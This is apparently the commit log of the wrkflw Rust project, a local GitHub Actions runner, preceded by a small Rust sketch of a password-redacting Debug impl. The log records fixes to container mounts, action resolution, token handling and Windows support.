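A manual Debug impl of the kind this commit describes might look like the sketch below. The `username` field and the `[REDACTED]` placeholder text are assumptions; the commit only states that the password field is redacted.

```rust
use std::fmt;

/// Stand-in for the real type; the `username` field is assumed.
struct ContainerCredentials {
    username: String,
    password: String,
}

impl fmt::Debug for ContainerCredentials {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        // Print a fixed placeholder instead of the real password.
        f.debug_struct("ContainerCredentials")
            .field("username", &self.username)
            .field("password", &"[REDACTED]")
            .finish()
    }
}
```

Formatting a value with `{:?}` then shows the placeholder wherever Debug is invoked, including panic messages and tracing output.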
|
|
e76f723034 |
fix(executor): fix phantom env paths and silent volume option drop
The remap_env_file closure had a fallback that would *invent* paths like /github/workflow/github_output when the corresponding env key didn't actually exist in job_env. Those paths point to nothing on the mounted volume, so any step that tries to write to them gets a lovely surprise. Only remap keys that actually exist in job_env now. If GITHUB_OUTPUT isn't set, we don't pretend it is.
While at it, volume mount options like :ro and :rw were being silently stripped with no warning. A user specifying :ro expects a read-only mount; silently giving them read-write is not great. Emit a warning when we drop mount options, matching the existing pattern in warn_unsupported_container_fields.
Add tests for both fixes plus container env precedence coverage. |
||
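The "only remap keys that exist" rule from this commit can be illustrated with a small sketch. The function name `remap_env_files` and its signature are hypothetical, and taking the file name from the host path is an assumption about how the remapped path is built.

```rust
use std::collections::HashMap;
use std::path::Path;

/// Rewrites the listed env-file variables to point into `container_dir`,
/// but only for keys that are actually present in `job_env`.
fn remap_env_files(job_env: &mut HashMap<String, String>, keys: &[&str], container_dir: &str) {
    for key in keys {
        // Derive the file name from the real host path (assumption).
        let remapped = job_env.get(*key).and_then(|host_path| {
            Path::new(host_path)
                .file_name()
                .and_then(|name| name.to_str())
                .map(|name| format!("{}/{}", container_dir.trim_end_matches('/'), name))
        });
        // Missing keys stay missing: no path is invented for them.
        if let Some(path) = remapped {
            job_env.insert((*key).to_string(), path);
        }
    }
}
```

With only GITHUB_ENV set, a call listing both GITHUB_ENV and GITHUB_OUTPUT rewrites the former and leaves the latter absent.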
|
|
2e1452d237 |
fix(executor): fix volume parsing and hardcoded env path remapping
The volume spec parser was using splitn(2, ':'), which means a Docker volume like "/host:/container:ro" would produce a container path of "/container:ro". That's not a path, that's a path with garbage appended. splitn(3, ':') strips the options correctly.
The env path remapping was hardcoding filenames like "/github/workflow/env" instead of deriving them from the actual host paths. If environment.rs ever renames those files, the remapping silently breaks and you get to debug phantom container failures. Derive the filename from the real path instead.
While at it, add unit tests for prepare_container_mounts and get_effective_runner_image, the two core functions from the container directive work that had zero test coverage. Nine tests covering Docker/Podman remapping, volume parsing (host:container, single-path, :ro/:rw options), and the image selection fallback. |
||
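The splitn(3, ':') parsing described above can be sketched as follows. `VolumeSpec` and `parse_volume` are hypothetical names, and mounting a single-path spec at the same path inside the container is an assumption. As the log notes elsewhere, splitting on ':' does not handle Windows drive-letter paths.

```rust
/// Parsed form of a `host:container[:options]` volume spec.
#[derive(Debug, PartialEq)]
struct VolumeSpec {
    host: String,
    container: String,
    options: Option<String>,
}

fn parse_volume(spec: &str) -> Option<VolumeSpec> {
    // At most three parts, so ":ro" / ":rw" end up in their own slot.
    let mut parts = spec.splitn(3, ':');
    let host = parts.next().unwrap_or("");
    // Assumption: a single path with no ':' is mounted at the same path.
    let container = parts.next().unwrap_or(host);
    let options = parts.next().map(String::from);
    // Reject specs such as "/host:" or ":/container".
    if host.is_empty() || container.is_empty() {
        return None;
    }
    Some(VolumeSpec {
        host: host.to_string(),
        container: container.to_string(),
        options,
    })
}
```

A caller can inspect `options` to warn when a mount option is about to be dropped.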
|
|
ecb9392d52 |
refactor(executor): deduplicate container mount logic and fix review issues
The container directive support in
|
||
|
|
2eae320953 |
fix(executor): support job-level container directive
It turns out that the Job struct in the parser had *no* container
field at all. When a workflow specified `container: alpine:3.22.1`,
serde silently dropped it, and the engine happily derived the runner
image from `runs-on` instead. So `apk add` runs inside Ubuntu.
Confusion ensues.
Add a JobContainer type with a custom deserializer that handles both
the string form (`container: alpine:3.22.1`) and the object form
(`container: { image: ..., env: ..., volumes: ... }`). A new
get_effective_runner_image() prefers the container image over the
runs-on mapping.
While at it, fix the GITHUB_ENV volume mounting for real container
runtimes. The old code identity-mounted the host temp path into the
container, which breaks on macOS with Podman because /var/folders
doesn't exist in the VM. Now we mount the github env directory at
/github/workflow/ and remap the env vars to match.
Container-level env vars and volumes are also wired through with
correct precedence (step > job > container).
Closes #58
|
||
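The image selection rule in this commit (prefer the job's container image over the runs-on mapping) can be sketched like this. The signature is hypothetical, and falling back to the runs-on image when the container image is empty or blank is an assumption, not something the log confirms.

```rust
/// Picks the image a job should run in.
/// `container_image` is the image from the job's `container:` directive, if any;
/// `runs_on_image` is whatever the `runs-on` label maps to.
fn effective_runner_image(container_image: Option<&str>, runs_on_image: &str) -> String {
    match container_image.map(str::trim) {
        // A non-empty container image always wins.
        Some(image) if !image.is_empty() => image.to_string(),
        // Assumption: an absent or empty image falls back to runs-on.
        _ => runs_on_image.to_string(),
    }
}
```

For a job with `container: alpine:3.22.1`, this returns the Alpine image, so `apk add` no longer runs inside Ubuntu.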
|
|
39006fd232 |
Merge pull request #70 from bahdotsh/fix/48-resolve-action-yml-for-docker-image
fix: resolve action.yml from remote repos to determine correct Docker image |
||
|
|
c21182d389 |
fix(executor): handle sub-path action refs and stop mutating env in tests
It turns out that action references like `github/codeql-action/init@v3` were being treated as if `github/codeql-action/init` was the repo name. The resolver would then try to fetch action.yml from `github/codeql-action/init/v3/action.yml` instead of the correct `github/codeql-action/v3/init/action.yml`. Same bug hit shallow_clone: it would try to clone a repo URL with the sub-path baked in, which obviously doesn't exist.
Add a `sub_path` field to `ActionInfo` so `resolve_action` splits `owner/repo/path@ref` into its actual components. The resolver, cache key, and composite action clone all use the sub-path correctly now.
While at it, stop using `std::env::set_var`/`remove_var` in the wiremock tests. Those are unsound in multi-threaded test binaries (Rust 1.83+ rightly marks them unsafe). Refactored `fetch_and_parse` to accept the token as a parameter; the tests just pass it directly, no env mutation needed. |
||
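Splitting `owner/repo/path@ref` into its components might look like the sketch below. `split_action_ref` is a hypothetical name, the struct is a simplified stand-in for the real `ActionInfo`, and only plain GitHub-style refs are handled here.

```rust
/// Simplified stand-in for the real ActionInfo type.
#[derive(Debug, PartialEq)]
struct ActionInfo {
    repository: String,
    sub_path: Option<String>,
    version: String,
}

fn split_action_ref(uses: &str) -> ActionInfo {
    // A missing `@ref` falls back to "main".
    let (path, version) = match uses.split_once('@') {
        Some((path, version)) => (path, version),
        None => (uses, "main"),
    };
    // owner / repo / everything else is the sub-path inside the repo.
    let mut segments = path.splitn(3, '/');
    let owner = segments.next().unwrap_or("");
    let repo = segments.next().unwrap_or("");
    let sub_path = segments.next().filter(|s| !s.is_empty()).map(String::from);
    ActionInfo {
        repository: format!("{}/{}", owner, repo),
        sub_path,
        version: version.to_string(),
    }
}
```

With the repository and sub-path separated, the action.yml location can be assembled as repository, then ref, then sub-path.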
|
|
8661771b8a |
fix(executor): fix shell injection, env var leak in tests, and missing docs
Three issues from code review, all small but all real:
The echo fallback in execute_step was interpolating the `uses` string
directly into a single-quoted sh -c argument. A workflow with a
single quote in the action ref would break out of the shell string.
Escape single quotes with the standard '\'' pattern.
The fetch_and_parse tests were calling env::remove_var("GITHUB_TOKEN")
and env::set_var() without saving and restoring the original value.
If GITHUB_TOKEN was set before the test suite ran, it would be
permanently wiped for subsequent tests. All three tests now
save/restore properly.
While at it, document the ActionInfo::version field semantics —
it's empty for docker/local refs, holds the git ref for GitHub
action refs, and defaults to "main" when omitted. Future readers
shouldn't have to guess.
|
||
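The `'\''` escaping mentioned in this commit works by closing the single-quoted string, emitting an escaped quote, and reopening it. A minimal sketch, with `shell_single_quote` as a hypothetical helper name:

```rust
/// Wraps `s` in single quotes for use as one POSIX shell word,
/// escaping embedded single quotes with the '\'' pattern.
fn shell_single_quote(s: &str) -> String {
    format!("'{}'", s.replace('\'', r"'\''"))
}
```

The result can be spliced into an `sh -c` script without a quote in the input ending the shell string early.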
|
|
f53a45e25d |
fix(executor): fix docker digest parsing, token leak in redirects, and missing tests
It turns out that resolve_action was blindly splitting on '@' for *all* action references, including Docker image refs like docker://alpine@sha256:abc123. The '@' in a Docker digest is not a version separator; it's part of the image reference. Splitting it produces a nonsensical repository and a fake "version" that happens to be a SHA256 digest. Nobody noticed because the Docker path doesn't use the version field, but the parsed data was still wrong.
While at it, the auth retry path in fetch_and_parse was constructing a brand new reqwest::Client on every single 404-then-retry cycle. That means a fresh TLS handshake each time, which is wasteful when we already have a perfectly good static client pattern. Promote the no-redirect client to a static Lazy, same as HTTP_CLIENT.
The auth redirect flow (where we send GITHUB_TOKEN to the origin but strip it before following a redirect to a CDN) had zero test coverage. This is the kind of security invariant that *really* should not depend on code review alone. Add wiremock-based tests that verify the token does not leak to redirect targets, plus tests for the basic auth retry and 404 paths. Parameterize fetch_and_parse with a base_url so wiremock can intercept the requests. |
||
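The digest problem comes down to deciding when '@' is a version separator at all. A hedged sketch follows, with `split_version` as a hypothetical helper; keeping the whole ref as the repository for `docker://` and `./` inputs is an assumption about the exact representation.

```rust
/// Returns (repository, version) for a `uses:` value.
fn split_version(uses: &str) -> (String, String) {
    // Docker image refs and local paths carry no separate version:
    // an '@' inside them (e.g. a sha256 digest) belongs to the ref itself.
    if uses.starts_with("docker://") || uses.starts_with("./") {
        return (uses.to_string(), String::new());
    }
    match uses.split_once('@') {
        Some((repository, version)) => (repository.to_string(), version.to_string()),
        // GitHub action refs without an explicit ref default to "main".
        None => (uses.to_string(), "main".to_string()),
    }
}
```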
|
|
9bdf24f86b |
fix(executor): fix review issues in action resolver and engine
The PR review flagged three things that deserved fixing:
The action resolver was silently swallowing the *first* error when action.yml failed and then retrying action.yaml. If action.yml existed but had a parse error, you'd never know; it just quietly tried the other filename. Now both error messages are combined so you actually get useful diagnostics.
There was a stale comment in engine.rs that read "rest of the existing code for handling regular actions", which was left over from the refactor and described absolutely nothing. Gone.
The SHA detection logic in shallow_clone was inline and untested. Extract it into is_git_sha() and add proper tests covering valid SHA-1, short hashes, branch names, tags, non-hex input, and off-by-one lengths. |
||
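Based on the description here and the later note that detection only matches 40-character hex strings, the extracted helper could look roughly like this. It is a sketch, not the project's actual is_git_sha().

```rust
/// True only for a full 40-character hexadecimal SHA-1.
/// Short hashes, branch names, and tags are treated as non-SHA refs.
fn is_git_sha(reference: &str) -> bool {
    reference.len() == 40 && reference.chars().all(|c| c.is_ascii_hexdigit())
}
```

Because the length check is exact, 39- and 41-character inputs are rejected along with abbreviated hashes.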
|
|
ce3099d757 |
fix(executor): add User-Agent header and handle auth redirects properly
The action resolver was making HTTP requests to raw.githubusercontent.com with no User-Agent header, which is the kind of thing that gets you silently rate-limited by GitHub's CDN. Not great when your whole resolution strategy depends on those requests actually succeeding.
While at it, the no-redirect policy on the authenticated retry path was *correct* for preventing token leakage to non-GitHub hosts, but it also meant that legitimate CDN redirects (3xx) would fall through to the success check and produce a misleading "HTTP 301 fetching..." error. Fix this by following the redirect with HTTP_CLIENT (no auth header) when we get a 3xx, so we get the content without leaking the token.
Also add a note on the SHA-1 detection in shallow_clone: it only matches 40-char hex strings, which will need updating if GitHub ever adopts SHA-256 refs. |
||
|
|
3ee75e6aa8 |
fix(executor): fix dead code, misleading comment, and token leak risk
The exit_code branching in execute_step had a classic nested-condition bug: the cargo-error detail block checked `exit_code != 0` *inside* an `if exit_code == 0` block. That entire error path was unreachable dead code. Confusion ensues. Flatten the branching so the cargo-error path is actually reachable on failure, and the verbose-output construction doesn't gate the entire result.
While at it, fix two things in action_resolver: the BoundedCache insert comment said "LRU order" when the eviction strategy is FIFO, and the authenticated retry for private repos was reusing the shared HTTP_CLIENT which follows redirects by default, meaning a hypothetical redirect away from raw.githubusercontent.com would happily forward the GITHUB_TOKEN to wherever it landed. Use a no-redirect client for the authenticated request instead. |
||
|
|
8dd6d1b143 |
fix(executor): correct misleading cache docs, token comment, and docker version semantics
Three issues from code review, all minor but all worth fixing before they confuse someone later.
The BoundedCache was documented as "LRU-style" when it's actually plain FIFO: get() doesn't promote keys. Nobody cares for this use case since actions resolve once per run, but calling FIFO "LRU" is the kind of lie that breeds real bugs when someone trusts the docs and adds access-pattern-dependent logic later. Fixed the comments.
The 404-retry-with-GITHUB_TOKEN pattern in fetch_and_parse was correct but undocumented. It *only* targets raw.githubusercontent.com so there's no token-to-attacker-host risk, but that's the kind of thing you want a future reader to see immediately without having to trace the URL construction. Added a comment.
resolve_action was setting version to "main" for docker:// refs and local paths (./), which is semantically wrong. Docker refs embed their tag in the repository string, and local paths have no version at all. Neither value was ever *used* in those code paths, but a wrong value sitting in a struct field is a bug waiting to happen. Set version to "" for both cases instead. |
||
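The FIFO-versus-LRU distinction is easiest to see in code. The sketch below is a plain FIFO bounded cache where get() does not promote keys; the field layout, the String key type, and the update-in-place behavior for existing keys are assumptions, not the project's BoundedCache.

```rust
use std::collections::{HashMap, VecDeque};

/// Bounded cache with FIFO eviction: the oldest *inserted* key goes first,
/// no matter how recently it was read.
struct BoundedCache<V> {
    capacity: usize,
    map: HashMap<String, V>,
    order: VecDeque<String>,
}

impl<V> BoundedCache<V> {
    fn new(capacity: usize) -> Self {
        Self { capacity, map: HashMap::new(), order: VecDeque::new() }
    }

    /// Lookup only; unlike an LRU cache, this does not touch `order`.
    fn get(&self, key: &str) -> Option<&V> {
        self.map.get(key)
    }

    fn insert(&mut self, key: String, value: V) {
        if self.capacity == 0 {
            return;
        }
        // Assumption: re-inserting an existing key keeps its queue position.
        if self.map.contains_key(&key) {
            self.map.insert(key, value);
            return;
        }
        if self.map.len() >= self.capacity {
            if let Some(oldest) = self.order.pop_front() {
                self.map.remove(&oldest);
            }
        }
        self.order.push_back(key.clone());
        self.map.insert(key, value);
    }
}
```

In a two-entry cache, reading the first key and then inserting a third still evicts the first, which is exactly where LRU would behave differently.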
|
|
de0cf0e419 |
fix(executor): harden action resolver: bounded cache, async clone, strict parsing
The action resolver had a few problems that would bite in production.
The ACTION_CACHE was an unbounded HashMap behind a Mutex — so it
leaked memory indefinitely in long-running processes, and readers
blocked each other for no good reason. Replace it with a bounded
LRU-style cache (256 entries, oldest evicted first) behind an RwLock
so concurrent reads don't serialize.
shallow_clone() was using std::process::Command in async context,
which blocks the tokio runtime thread. For SHA refs that's *three*
sequential blocking operations. Convert the whole thing to
tokio::process::Command. While at it, add `--` before positional
args to prevent flag injection from crafted version strings, and
`--single-branch` to avoid fetching unnecessary refs.
The node version parser silently defaulted to 20 on malformed input
("nodefoo" -> node:20-slim). That's the kind of silent data
corruption that makes debugging a nightmare. Return an error instead.
HTTP timeout reduced from 15s to 5s — this is best-effort with a
fallback, so waiting 30s (two filenames × 15s) on a flaky network
is not helpful. GITHUB_TOKEN is now only sent on 404 retry instead
of unconditionally, because leaking tokens to public repos you don't
own is not great practice.
Also killed a dead conditional where both branches of an
if/else produced identical output.
|
||
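The strict node version parsing described in this commit might be sketched as below. `node_image` is a hypothetical name and the String error type is a simplification; the `node:<major>-slim` tag format follows the `node:20-slim` example in the log.

```rust
/// Maps a `runs.using` value such as "node20" to a Docker image tag.
/// Malformed input is an error instead of silently becoming node 20.
fn node_image(using: &str) -> Result<String, String> {
    let version = using
        .strip_prefix("node")
        .ok_or_else(|| format!("not a node runtime: {using:?}"))?;
    if version.is_empty() || !version.bytes().all(|b| b.is_ascii_digit()) {
        return Err(format!("malformed node version: {using:?}"));
    }
    Ok(format!("node:{version}-slim"))
}
```

Callers that want the old behavior can still opt into a default explicitly, which keeps the fallback visible at the call site.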
|
|
419ccf97d4 |
fix(executor): harden action resolver and kill magic string dispatch
It turns out that prepare_action() was returning the string "composite" as if it were a Docker image name, and then execute_step() was checking `if image == "composite"` to decide the control flow. This is not great. Stringly-typed dispatch hiding inside what *looks* like an image name is the kind of thing that confuses every future contributor. Replace the String return with a proper PreparedAction enum that makes the Composite vs Image distinction explicit at the type level.
While at it, fix several other bugs in the action resolver:
- git clone --branch doesn't work with SHA refs, and actions pinned to full commit SHAs (a perfectly normal thing to do) would just fail with a confusing git error. Extract a shared shallow_clone() helper that detects SHA refs and uses init+fetch+checkout instead.
- DockerBuild actions (ones that bundle their own Dockerfile) were silently falling through to determine_action_image(), which would cheerfully return node:20-slim. Return an explicit error instead of pretending everything is fine.
- Failed action.yml fetches were permanently cached as None, so a transient network hiccup would poison the cache for the entire process lifetime. Only cache successes now.
- The reusable workflow clone had the same --branch SHA bug; it now uses the shared shallow_clone() helper too. |
||
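Replacing the magic string with an enum could look like the sketch below. The variant payloads (an image name and a directory path) and the `plan_step` function are assumptions made for illustration; the log only names the Composite and Image variants.

```rust
use std::path::PathBuf;

/// Result of preparing an action; payload types are assumed.
#[derive(Debug, PartialEq)]
enum PreparedAction {
    Image(String),
    Composite(PathBuf),
}

/// The compiler forces every caller to handle both cases explicitly,
/// instead of comparing an image name against the string "composite".
fn plan_step(action: &PreparedAction) -> String {
    match action {
        PreparedAction::Image(image) => format!("run in container image {image}"),
        PreparedAction::Composite(dir) => {
            format!("run composite steps from {}", dir.display())
        }
    }
}
```

Adding a third variant later produces a compile error at every `match` that has not been updated, which a string comparison never would.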
|
|
639d86ad3b |
fix(executor): handle DockerBuild actions and harden action resolver
The previous commit added remote action.yml resolution, which was a good idea in principle. But it had a *rather significant* problem: when an action declares `runs.image: Dockerfile` (meaning "build my bundled Dockerfile"), the resolver happily returned the literal string "Dockerfile" as the Docker image name. Confusion ensues. Downstream code tries to pull an image called "Dockerfile" from a registry. That doesn't work.
Add a DockerBuild variant to ActionType for actions that bundle their own Dockerfile. image_for_action() now returns Option<String> (None for DockerBuild) so the caller falls back to the hardcoded mapping instead of trying to pull nonsense from a registry.
While at it, fix several other problems from the initial PR:
- Reuse a static reqwest::Client instead of creating one per HTTP request, because TLS initialization on every fetch is wasteful
- Capture git clone stderr instead of sending it to /dev/null, so when cloning a remote composite action fails you actually get to know *why*
- Add tests for ActionInfo.version parsing in the parser (the field was added but never tested, please don't do that)
- Add edge-case tests for DockerBuild, unknown using values, missing fields, and the docker://Dockerfile prefix variant |
||
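The Option-returning image lookup described here can be sketched as follows. Only the DockerBuild variant and the Option<String> return type come from the commit message; the other variants, their payloads, and returning None for composite actions are assumptions.

```rust
/// Simplified stand-in for the real ActionType; variants other than
/// DockerBuild are assumed for illustration.
enum ActionType {
    Node { version: u32 },
    DockerImage(String),
    DockerBuild,
    Composite,
}

/// Returns the image to pull, or None when there is nothing to pull.
fn image_for_action(action: &ActionType) -> Option<String> {
    match action {
        ActionType::Node { version } => Some(format!("node:{version}-slim")),
        ActionType::DockerImage(image) => Some(image.clone()),
        // A bundled Dockerfile must be built, not pulled from a registry.
        ActionType::DockerBuild => None,
        // Assumption: composite actions have no image of their own.
        ActionType::Composite => None,
    }
}
```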
|
|
f2c6097534 |
fix: resolve action.yml from remote repos to determine correct Docker image
Fixes #48. When encountering third-party GitHub Actions, wrkflw previously defaulted to node:20-slim for all unknown actions. Now it fetches the action's action.yml from raw.githubusercontent.com, parses runs.using to determine the action type (Node/Docker/Composite), and selects the appropriate Docker image. Falls back to the existing hardcoded mapping on any failure. |
||
|
|
05ed4d12b4 |
docs: add AI agent codebase navigation guides
Add CLAUDE.md, AGENTS.md, and INDEX.md — all generated by the indxr MCP tooling to give AI coding assistants a structured way to explore the codebase without dumping entire files into context. CLAUDE.md is the detailed version with token cost estimates and a full tool reference. AGENTS.md is the condensed version. INDEX.md is an auto-generated codebase index with file summaries and symbol maps. While at it, add .indxr-cache/ to .gitignore because nobody needs that in the repo. |
||
|
|
baf6157ab0 |
Merge pull request #69 from sonwr/fix-64-empty-trigger-globs
fix: allow empty trigger glob filters in workflow parser |
||
|
|
b90f07f945 | fix(parser): allow empty trigger glob arrays | ||
|
|
81d8d7ab6d |
Merge pull request #63 from bahdotsh/fix/remote-workflow-tempdir-lifecycle
fix: resolve tempdir lifecycle issue in remote workflow execution |
||
|
|
1d2008852e |
fix: resolve tempdir lifecycle issue in remote workflow execution
- Fix remote workflow execution failing with 'No such file or directory'
- Move workflow parsing and execution inside tempdir scope to prevent premature cleanup of temporary directory
- Ensure TempDir stays alive during entire remote workflow lifecycle
- Remote workflows like pytorch/test-infra/.github/workflows/*.yml@main now execute successfully
Resolves #47 |
||
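The lifecycle issue is a general one: a directory that is cleaned up on drop disappears as soon as its owner goes out of scope. The sketch below uses a hand-rolled guard as a stand-in for the TempDir type mentioned in the commit; `TempDirGuard` and `with_temp_checkout` are hypothetical names, and the real code may be structured differently.

```rust
use std::fs;
use std::io;
use std::path::{Path, PathBuf};

/// Removes its directory when dropped.
struct TempDirGuard {
    path: PathBuf,
}

impl Drop for TempDirGuard {
    fn drop(&mut self) {
        let _ = fs::remove_dir_all(&self.path);
    }
}

/// Runs `work` while the temporary directory is guaranteed to exist.
fn with_temp_checkout<T>(dir_name: &str, work: impl FnOnce(&Path) -> T) -> io::Result<T> {
    let path = std::env::temp_dir().join(dir_name);
    fs::create_dir_all(&path)?;
    let guard = TempDirGuard { path };
    // The guard is still alive here, so parsing and execution can read files.
    let result = work(&guard.path);
    // `guard` is dropped at the end of this function, after `work` has finished.
    Ok(result)
}
```

Returning only a path out of the scope that owns the guard reproduces the original failure: the path outlives the directory it points to.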
|
|
c707bf8b97 |
Merge pull request #61 from bahdotsh/fix/docker-github-env-volume-mounting
fix(docker): mount GitHub environment files directory into containers |
||
|
|
b1cc74639c | version fix | ||
|
|
f45babc605 |
fix(docker): mount GitHub environment files directory into containers
- Mount GitHub environment files directory containing GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH, and GITHUB_STEP_SUMMARY
- Resolves Docker container exit code -1 when writing to $GITHUB_ENV
- Update volume mapping in both step execution contexts in engine.rs
- Tested on macOS with Docker Desktop
Closes: Issue where echo "VAR=value" >> "$GITHUB_ENV" fails in Docker runtime |
||
|
|
7970e6ad7d |
Release 0.7.3
wrkflw@0.7.3
wrkflw-evaluator@0.7.3
wrkflw-executor@0.7.3
wrkflw-github@0.7.3
wrkflw-gitlab@0.7.3
wrkflw-logging@0.7.3
wrkflw-matrix@0.7.3
wrkflw-parser@0.7.3
wrkflw-runtime@0.7.3
wrkflw-secrets@0.7.3
wrkflw-ui@0.7.3
wrkflw-utils@0.7.3
wrkflw-validators@0.7.3
Generated by cargo-workspaces
wrkflw-secrets@0.7.3 wrkflw-validators@0.7.3 wrkflw-utils@0.7.3 wrkflw-ui@0.7.3 wrkflw-gitlab@0.7.3 wrkflw-logging@0.7.3 wrkflw-matrix@0.7.3 wrkflw-parser@0.7.3 wrkflw-runtime@0.7.3 v0.7.3 wrkflw-github@0.7.3 wrkflw-executor@0.7.3 wrkflw-evaluator@0.7.3 wrkflw@0.7.3 |
||
|
|
51a655f07b | version fixes | ||
|
|
7ac18f3715 |
Release 0.7.2
wrkflw-runtime@0.7.2
wrkflw-utils@0.7.2
Generated by cargo-workspaces
v0.7.2 wrkflw-runtime@0.7.2 wrkflw-utils@0.7.2 |
||
|
|
1f3fee7373 |
Merge pull request #56 from bahdotsh/fix/windows-compatibility
fix(utils): add Windows support to fd module |
||
|
|
f49ccd70d9 |
fix(runtime): remove unnecessary borrow in Windows taskkill command
- Fix clippy needless_borrows_for_generic_args warning
- Change &pid.to_string() to pid.to_string() for taskkill /PID argument
- Ensure clippy passes with -D warnings on Windows builds |
||
|
|
5161882989 |
fix(utils): remove unused imports to fix Windows clippy warnings
- Remove unused io::self import from common scope
- Remove unused std::fs::OpenOptions and std::io::Write from windows_impl
- Add std::io import to unix_impl to fix io::Error references
- Ensure clippy passes with -D warnings on all platforms |
||
|
|
5e9658c885 |
ci: add Windows to build matrix and integration tests
- Add windows-latest to OS matrix with x86_64-pc-windows-msvc target
- Add dedicated Windows integration test job
- Verify Windows executable functionality
- Ensure cross-platform compatibility testing
This ensures Windows build issues are caught early in the CI/CD pipeline. |
||
|
|
aa9da33b30 |
docs(utils): update README to document cross-platform fd behavior
- Document Unix vs Windows fd redirection limitations
- Update example to reflect platform-specific behavior
- Clarify that stderr suppression is Unix-only |
||
|
|
dff3697052 |
fix(utils): add Windows support to fd module
- Add conditional compilation for Unix/Windows platforms
- Move nix dependency to Unix-only target dependency
- Implement Windows-compatible fd redirection API
- Preserve full functionality on Unix systems
- Add comprehensive documentation for platform differences
Resolves Windows build errors:
- E0433: could not find 'sys' in 'nix'
- E0432: unresolved import 'nix::fcntl'
- E0433: could not find 'unix' in 'os'
- E0432: unresolved import 'nix::unistd'
Closes #43 |
||
|
|
5051f71b8b |
Release 0.7.1
wrkflw@0.7.1
wrkflw-evaluator@0.7.1
wrkflw-executor@0.7.1
wrkflw-parser@0.7.1
wrkflw-runtime@0.7.1
wrkflw-secrets@0.7.1
wrkflw-ui@0.7.1
Generated by cargo-workspaces
wrkflw-parser@0.7.1 wrkflw-evaluator@0.7.1 wrkflw-executor@0.7.1 v0.7.1 wrkflw-runtime@0.7.1 wrkflw-secrets@0.7.1 wrkflw-ui@0.7.1 wrkflw@0.7.1 |